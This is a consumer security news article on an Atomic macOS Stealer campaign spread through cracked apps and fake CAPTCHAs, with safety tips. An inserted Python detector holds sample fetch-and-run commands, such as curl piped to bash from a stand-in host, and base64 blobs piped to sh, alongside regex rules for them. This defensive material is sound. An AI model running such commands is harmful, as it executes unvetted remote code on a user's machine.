Macs under attack from ‘cracked’ apps spreading dangerous info-stealing malware — don’t fall for this

Hackers are once again targeting the best MacBooks and other Apple computers in an effort to infect them with dangerous malware designed to steal passwords, files, browser data and more.

As reported by Infosecurity Magazine, the cybersecurity firm Trend Micro recently discovered a new Atomic macOS Stealer campaign that uses ‘cracked’ or pirated versions of popular macOS software as a lure. When this doesn’t work, the cybercriminals behind this campaign use a fake CAPTCHA to the same end.

While you might think your Mac is safer than one of the best Windows laptops, think again, as hackers now love to target Apple’s computers in their attacks. This makes sense, too, as those willing to pay more for a premium laptop will likely make better (and more profitable) targets.

Here’s everything you need to know about this new campaign along with some tips and tricks to help keep you and your Apple computer safe from hackers.

From cracked to hacked

In its report, Trend Micro reveals that this new campaign begins with an attacker tricking a macOS user into downloading a fake or cracked version of a popular app. This malicious app then acts as a Trojan horse to deliver and install the Atomic macOS Stealer onto their computer.

These fake apps could be promoted on forums, in direct messages sent over social media or even through malicious ads. When a potential victim goes to download one of them, they’re redirected to a hacker-controlled page and prompted to click on a button which reads “Download for MacOS.”

In one case analyzed by Trend Micro’s security researchers, victims saw their Macs infected with malware after trying to download a cracked version of the legitimate app CleanMyMac. While the download site appeared to be legitimate at first glance, clicking on the “Download Now” button took them to an Atomic macOS Stealer landing page.

Alternatively, victims might be instructed to copy and paste commands into Apple Terminal. Doing so leads to the execution of a malicious installation script which creates a binary file that lets the hackers establish persistence on a vulnerable Mac.

From there, the script copies loads of sensitive data off an infected Apple computer, including:

  • System Profile information
  • Username and password
  • Browser data (including cookies, web data, and login information)
  • Cryptocurrency wallet data
  • Telegram data
  • OpenVPN profiles
  • Keychain data
  • Apple Notes data
  • Various files from folders on the system

All of this sensitive personal data is then compressed and sent back to a hacker-controlled server to use in follow-up attacks. Likewise, this data could also be sold to other hackers on the dark web to use in their own attacks.
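
A defender-side check for the Terminal copy-and-paste lure described above, as an added example that is not from the article or from Trend Micro's report: it flags pasted text that downloads or decodes content and hands it straight to an interpreter. The rule set, the function name `assess_pasted_command` and the sample commands are assumptions made for illustration.

```python
import re

# Heuristic rules: assumptions chosen for this example, not indicators taken
# from Trend Micro's report. Each label names a generic pattern in which
# fetched or decoded content is executed without ever being inspected.
INTERP = r"(?:ba|z|k)?sh|python3?|osascript|perl|ruby"
RULES = {
    "download piped to interpreter": re.compile(
        rf"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:{INTERP})\b"),
    "download run via command substitution": re.compile(
        rf"\b(?:{INTERP})\b[^|;&]*(?:\$\(|`)\s*(?:curl|wget)\b"),
    "decoded blob piped to interpreter": re.compile(
        rf"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*(?:sudo\s+)?(?:{INTERP})\b"),
}


def assess_pasted_command(text: str) -> list[str]:
    """Return the sorted labels of every rule the pasted text triggers."""
    # Join backslash line continuations, then judge each logical line on its
    # own so unrelated lines in one paste are not combined into a false hit.
    logical_lines = re.sub(r"\\\r?\n\s*", " ", text).splitlines()
    return sorted({
        label
        for line in logical_lines
        for label, rule in RULES.items()
        if rule.search(line)
    })


SAMPLES = [  # constructed inputs; example.invalid never resolves
    "curl -fsSL https://example.invalid/install.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
    "echo ENCODED_BLOB_PLACEHOLDER | base64 -d | sh",
    "curl -fsSL https://example.invalid/install.sh \\\n  | sudo zsh",
    "curl -LO https://example.invalid/App.dmg",                 # plain download
    "curl -s https://example.invalid/App.dmg | shasum -a 256",  # hash check
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        hits = assess_pasted_command(cmd)
        print("REVIEW" if hits else "ok    ", repr(cmd), hits)
```

A match means the command would run content nobody has looked at; saving the script to a file and reading it first removes that blind spot.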

How to stay safe from Mac malware

Just like on one of the best iPhones, you want to stick to the Apple App Store for downloading new apps for your Mac when possible. If you do download an app from outside the App Store, make sure it’s from the website of a reputable Mac developer first.

To do so, carefully examine the URL and look for misspelled words or poor grammar, as these can be a dead giveaway that you’re on a malicious site and not a legitimate one. You also want to be careful about how you get to a vendor’s site. Ads that appear in the top results on Google and other search engines can be faked, so instead of clicking on them, scroll further down the page to find the company’s actual site.

Although it goes without saying, you should never download cracked or pirated software. Besides hurting developers, doing so puts you at risk since you never really know what’s inside an app you downloaded illegally. Sure, it could work as intended but there’s also a chance that it might contain malicious code designed to steal your data or worse, take over your Mac.

As for staying safe, while your Mac does come with built-in protection in the form of Gatekeeper and XProtect, you may also want to consider using one of the best Mac antivirus software solutions alongside them. Third-party antivirus software is updated more regularly and it often includes other useful extras like access to one of the best VPN services or a password manager.

Hackers will likely continue to prey on Mac users, given that the old and no longer true advice that Apple computers can’t get viruses is still quite widespread. However, you can stay safe by remaining vigilant online, especially when downloading new software and apps.

Anthony Spadafora
Managing Editor Security and Home Office

Anthony Spadafora is the managing editor for security and home office furniture at Tom’s Guide where he covers everything from data breaches to password managers and the best way to cover your whole home or business with Wi-Fi. He also reviews standing desks, office chairs and other home office accessories with a penchant for building desk setups. Before joining the team, Anthony wrote for ITProPortal while living in Korea and later for TechRadar Pro after moving back to the US. Based in Houston, Texas, when he’s not writing Anthony can be found tinkering with PCs and game consoles, managing cables and upgrading his smart home. 
